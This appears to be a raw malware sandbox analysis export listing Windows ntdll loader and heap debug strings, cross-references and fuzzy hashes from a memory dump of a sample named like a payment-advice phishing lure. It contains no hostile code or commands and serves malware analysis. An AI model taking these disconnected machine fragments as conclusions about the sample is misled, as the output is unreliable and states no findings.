                                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                            • API String ID: 0-1109411897
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-792281065
                                                                                                                                            Strings
                                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016F9A2A
                                                                                                                                            • LdrpInitShimEngine, xrefs: 016F99F4, 016F9A07, 016F9A30
                                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 016F9A01
                                                                                                                                            • apphelp.dll, xrefs: 01696496
                                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016F99ED
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016F9A11, 016F9A3A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-204845295
                                                                                                                                            Strings
                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01712178
                                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01712180
                                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01712160, 0171219A, 017121BA
                                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0171219F
                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017121BF
                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01712165
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                            • API String ID: 0-861424205
                                                                                                                                            Strings
                                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 017181E5
                                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 01718177, 017181EB
                                                                                                                                            • LdrpInitializeProcess, xrefs: 016DC6C4
                                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01718170
                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01718181, 017181F5
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016DC6C3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                            • API String ID: 0-475462383
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 016E2DF0: LdrInitializeThunk.NTDLL ref: 016E2DFA
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016E0BA3
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016E0BB6
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016E0D60
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016E0D74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1404860816-0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                            • API String ID: 0-379654539
                                                                                                                                            Strings
                                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 016D855E
                                                                                                                                            • @, xrefs: 016D8591
                                                                                                                                            • LdrpInitializeProcess, xrefs: 016D8422
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016D8421
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-1918872054
                                                                                                                                            Strings
                                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017122B6
                                                                                                                                            • .Local, xrefs: 016D28D8
                                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017121D9, 017122B1
                                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 017121DE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                            • API String ID: 0-1239276146
                                                                                                                                            Strings
                                                                                                                                            • RtlDeactivateActivationContext, xrefs: 01713425, 01713432, 01713451
                                                                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0171342A
                                                                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01713456
                                                                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01713437
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                            • API String ID: 0-1245972979
                                                                                                                                            Strings
                                                                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01701028
                                                                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0170106B
                                                                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017010AE
                                                                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01700FE5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                            • API String ID: 0-1468400865
                                                                                                                                            Strings
                                                                                                                                            • LdrpDynamicShimModule, xrefs: 0170A998
                                                                                                                                            • apphelp.dll, xrefs: 016C2462
                                                                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0170A992
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0170A9A2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                            Strings
                                                                                                                                            • HEAP: , xrefs: 016B3264
                                                                                                                                            • HEAP[%wZ]: , xrefs: 016B3255
                                                                                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016B327D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $@
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                            Strings
                                                                                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0170A10F
                                                                                                                                            • LdrpCheckModule, xrefs: 0170A117
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0170A121
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                            Strings
                                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 017182D7
                                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 017182DE
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017182E8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                            Strings
                                                                                                                                            • PreferredUILanguages, xrefs: 0175C212
                                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0175C1C5
                                                                                                                                            • @, xrefs: 0175C1F1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                            Strings
                                                                                                                                            • LdrpCheckRedirection, xrefs: 0172488F
                                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01724888
                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01724899
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                            • API String ID: 0-2558761708
                                                                                                                                            Strings
                                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 017220F3
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01722104
                                                                                                                                            • LdrpInitializationFailure, xrefs: 017220FA
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-2986994758
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: #%u
                                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                                            Strings
                                                                                                                                            • LdrResSearchResource Exit, xrefs: 016AAA25
                                                                                                                                            • LdrResSearchResource Enter, xrefs: 016AAA13
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                            • API String ID: 0-4066393604
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: `$`
                                                                                                                                            • API String ID: 0-197956300
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$MUI
                                                                                                                                            • API String ID: 0-17815947
                                                                                                                                            Strings
                                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 016A063D
                                                                                                                                            • kLsE, xrefs: 016A0540
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                            • API String ID: 0-2547482624
                                                                                                                                            Strings
                                                                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 016AA2FB
                                                                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 016AA309
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                            • API String ID: 0-2876891731
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID: Cleanup Group$Threadpool!
                                                                                                                                            • API String ID: 2994545307-4008356553
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: MUI
                                                                                                                                            • API String ID: 0-1339004836
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: GlobalTags
                                                                                                                                            • API String ID: 0-1106856819
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .mui
                                                                                                                                            • API String ID: 0-1199573805
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: EXT-
                                                                                                                                            • API String ID: 0-1948896318
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: BinaryHash
                                                                                                                                            • API String ID: 0-2202222882
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #
                                                                                                                                            • API String ID: 0-1885708031
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: BinaryName
                                                                                                                                            • API String ID: 0-215506332
                                                                                                                                            Strings
                                                                                                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0172895E
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                            • API String ID: 0-702105204
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                            • Instruction ID: 92969cfe471869ae3494c52cf11b40a7eac660e978d81fb9e14d0f9a2d9a737d
                                                                                                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                            • Instruction Fuzzy Hash: 81F16E75E0021A9BDB15DF99C990BBEBBF5EF48B10F04816DE905AB390EB34E941CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 377baadbb25548597744970a6ca11d73437b2a8a1e8adacf7d72061a2fe629b0
                                                                                                                                            • Instruction ID: 0dc2569572a9d8f41787d78800b373163eaf957a07814658c68e8a40220a0ee4
                                                                                                                                            • Opcode Fuzzy Hash: 377baadbb25548597744970a6ca11d73437b2a8a1e8adacf7d72061a2fe629b0
                                                                                                                                            • Instruction Fuzzy Hash: 21D1E471E0061A8BDF05CF68C841AFEF7F5AFC8304F1882A9E555A7242D735EA06CB51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: faf50ca2da1871160379221618bf86ed1a2f560269956039d71774488c671ade
                                                                                                                                            • Instruction ID: 35b209172ffab1ffcb5afdd33b1814e3a16253ae5e5b5d70c4cda8b625724135
                                                                                                                                            • Opcode Fuzzy Hash: faf50ca2da1871160379221618bf86ed1a2f560269956039d71774488c671ade
                                                                                                                                            • Instruction Fuzzy Hash: DEE16C71608342CFC715CF28C890A6ABBE1FF89314F498A6DE99587351EB31E945CF92
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5e93f464241bfca17cd07ab536f5e0b23ac6c8f960ca9e7d065ad0758591354e
                                                                                                                                            • Instruction ID: 98f57cdb9270b97663a2e4e98c0febaf321dc0e64627fbb2f5606bcfd9c07660
                                                                                                                                            • Opcode Fuzzy Hash: 5e93f464241bfca17cd07ab536f5e0b23ac6c8f960ca9e7d065ad0758591354e
                                                                                                                                            • Instruction Fuzzy Hash: 06D10371A0021A9BDF14CF68CC90ABEB7ADBF55704F05422DEA12DF280E734E955CB60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                            • Instruction ID: bcd66dd512f5947b1d9b5b80ec2070f3789ee26dba34c6157d130e88cfa29fc7
                                                                                                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                            • Instruction Fuzzy Hash: 41B1BF75A00615AFDB24DF98C940BABFBFABF85304F10446DEA0297794DA36E906CB11
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                            • Instruction ID: 82bbb8aa15b311c05a82e305036c01e6e70f3e6ef89c0fa0d4323c67178b877d
                                                                                                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                            • Instruction Fuzzy Hash: 81B1C371600646EFDB26DB68CD94BBFFBF6AF44200F180569E65297381D730E981CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8614e63681768fe68937f4eeac0c8324499f75f9db974447aa089ab2f0ae8b09
                                                                                                                                            • Instruction ID: 44992b195f219300433b4449444029f04d0a9e940b4f4a273d12955db195e8cd
                                                                                                                                            • Opcode Fuzzy Hash: 8614e63681768fe68937f4eeac0c8324499f75f9db974447aa089ab2f0ae8b09
                                                                                                                                            • Instruction Fuzzy Hash: DCC13674508341CFE764CF19C894BABB7E9BF88304F84496DE98987291D774E909CFA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d84e6ce46bde61cedebfd25317903985ee191c596bd13d32189f93fa5dc49860
                                                                                                                                            • Instruction ID: 626a39821d0459cf5d6a8fec9b977df49638f7d5f07e506377db28d0b68af209
                                                                                                                                            • Opcode Fuzzy Hash: d84e6ce46bde61cedebfd25317903985ee191c596bd13d32189f93fa5dc49860
                                                                                                                                            • Instruction Fuzzy Hash: FDB15170A002658BDB64DF58CC90BA9B7B6EF44704F0485EED54AE7381EB709D86CB24
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0ebe0f10ffd2b2cac8c11a52e59d0adc80980c78896ab64a2e8a1fa673330390
                                                                                                                                            • Instruction ID: 8cdab37f0dbe25cdac80ecf6d11acd5fde53a71c546833464bbb1277cf81307b
                                                                                                                                            • Opcode Fuzzy Hash: 0ebe0f10ffd2b2cac8c11a52e59d0adc80980c78896ab64a2e8a1fa673330390
                                                                                                                                            • Instruction Fuzzy Hash: 49A1B031E00765DBEB32DAA8CC48BBEBBF5EB01B14F050259EA11AB2D1D7749D41CB91
                                                                                                                                            Memory Dump Source
